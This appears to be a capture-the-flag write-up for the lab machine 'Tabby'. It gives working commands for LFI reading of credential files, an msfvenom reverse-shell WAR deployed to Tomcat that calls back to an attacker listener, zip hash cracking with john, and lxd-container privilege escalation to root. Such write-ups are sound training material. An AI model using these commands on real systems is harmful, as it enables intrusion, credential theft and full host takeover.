# TABBY | 10.10.10.194

## Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.10.194
    
### Open Ports and Service Enumeration

#### 22 - SSH - OpenSSH 8.2p1 Ubuntu

Standard setup. I will come back this way if I find creds.

#### 80 - HTTP - Apache http 2.4.41

It is a page for a webhosting service.

![Mega hosting](img/port-80.png)

The website has a statement about a previous security breach and that they plan to do better:

![Statement](img/statement.png)

But.... But look at the web address for that page:

![Web address](img/URL.png)

Maybe I could try just a little bit of LFI (local file inclusion)...

    http://megahosting.htb/news.php?file=../../../../etc/passwd
    
![LFI](img/etc-passwd.png)

So now I have a username maybe for later.

#### 8080 - HTTP - Apache Tomcat

This is what looks like a default Apache Tomcat install.

![Tomcat default page](img/tomcatdefault.png)

There is useful information on this page, about the locations of certain files, and the path to the manager app, but it is obvi password-protected:

![tomcat login](img/login.png)

But since there is an LFI on the other page, it should be possible to find the famous 'tomcat-users.xml' file somewhere. I ran gobuster in fuzz mode with all of the LFI lists I had and came up empty, before I realized that none of the lists had anything relating to tomcat in them. So I added the entries manually from the default page:

![additional entries to LFI list](img/entries.png)

Then I ran the gobuster command again:

    gobuster fuzz -u http://megahosting.htb/news.php?file=../../../..FUZZ -t 50 -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --exclude-length 0
    
And I actually found it:

![gobuster fuzz result](img/gobuster-fuzz.png)

Here is a screenshot of the bottom of the file, viewed from source:

![tomcat-users.xml](img/tomcatusers.png)

So we have a username of 'tomcat' and a password of '$3cureP4s5w0rd123!'.

## Exploitation - shell as tomcat

Now that we have creds, I'm going to login to the manager app:

![manager](img/manager.png)

Once inside, I can upload a malicious .war file to get a reverse shell. I can use 'msfvenom' to generate it:

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.29 LPORT=6969 -f war -o bowser.war
    
Then I spin up a netcat listener to catch the shell:

    nc -nvvlp 6969
    
But when I went to look to upload the file, there was actually no option. I'm in the `/host-manager` app, not the actual administration page. But [this page](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat) shows me a way to deploy files by command line:

    curl -u 'tomcat:$3cureP4s5w0rd123!' http://megahosting.htb:8080/manager/text/deploy?path=/bowser -T bowser.war
    
After messing with syntax a bit that was the command that worked - as shown here with a success message:

![Successful deployment](img/bowser.png)

Now I just need to trigger it, which I can also do by using curl:

    curl http://megahosting.htb:8080/bowser
    
![tomcat shell](img/tomcat-shell.png)

## Privilege Escalation - tomcat > ash

This user is pretty locked down, and there is something the matter with invoking sudo, saying that it is a read-only file system.

The tomcat user has no access to the user ash's home directory, so no reading the flag until I privesc.

### linpeas

This did not show much besides a file owned by ash, sitting in the `/var/www/html/files/` dir:

![backup file owned by ash](img/ash-backup.png)

### pspy64

This process spy binary did not show anything that linpeas did not.

I also used Linux Exploit Suggester but as this is Ubuntu 20.04 on the 5.4 kernel it found nothing.

### backup.zip

I copied this file over to `/dev/shm` and tried to unzip, but it wanted a password, so I transferred it over to my box using netcat and got to work.

First step is to use 'zip2john' to get a john-crackable hash out of it:

    zip2john backup.zip > hash
    
Now I have a crackable hash:

![hash](img/hash.png)

Next I can use john and the rockyou wordlist to crack it, hopefully:

    john --wordlist=~/dox/wordlists/rockyou.txt hash
    
In a moment it appears I had it:

![cracked hash](img/cracked-hash.png)

OK - I extracted all the contents using that password, and it was just a simple backup of the main website, nothing special at all. But then I went and did an `su ash` into the target console window:

![ash shell](img/ash-shell.png)

So now I have access. Here is the flag:

![user flag](img/user-flag.png)

## Privilege Escalation - ash > root

Ash is a member of the lxd group, which is a group for linux container users. This was the privesc in the Brainfuck box as well.

First I need to download and install a simple linux container to my local machine:

    git clone https://github.com/saghul/lxd-alpine-builder.git
    cd lxd-alpine-builder
    sudo ./build-alpine
    
This took a bit of work, as the build-alpine script is not working properly as of Feb 2 2021 - I had to add my own mirror list and then it worked.

If that command works out, then there is a tar.gz file. I transferred that over to the target and set about typing these commands:

    lxc image import ./<tar.gz file> --alias <give it an alias>
    lxd init (then accept all defaults)
    lxc init <alias> <another name> -c security.privileged=true
    lxc config device add <name> <choose a disk name> disk source=/ path=/mnt/root recursive=true
    lxc start <name>
    lxc exec <name> /bin/sh

![gibson root shell](img/gibson-shell.png)

Ok, so I am in a root shell of the container, but the tabby filesystem is mounted. I can simply read the root flag, but I'd rather have something more substantial. I will copy the bash binary and make it an SUID binary:

    cp /mnt/root/bin/bash /mnt/root/tmp/bash
    cd /mnt/root/tmp
    chmod +s ./bash

Here is the SUID-bash in the `/mnt/root/tmp` directory:

![SUID bash](img/suid-bash.png)

However, when I exited the container the bash binary was nowhere to be found in the `/tmp` directory. So I went back into the container and instead just made the original bash (in `/usr/bin`) an SUID binary:

![SUID bash again](img/suid-bash2.png)

OK, now I just have to execute `bash -p` and I will be root:

![root shell](img/root-shell.png)

And here is the root flag:

![root flag](img/root-flag.png)

## Conclusion

This was a more up to date version of exploits I have done before, and it was a good demonstration of LFI as well as password reuse.

**Steps taken:**

* Find LFI in webpage, use it to find tomcat credentials, login as user
* Upload malicious .war file using tomcat text interface, get shell as tomcat
* Find website backup.zip, crack using john, discover password
* Reuse password to privesc to ash
* Use ash's lxd group membership to privesc to root
    

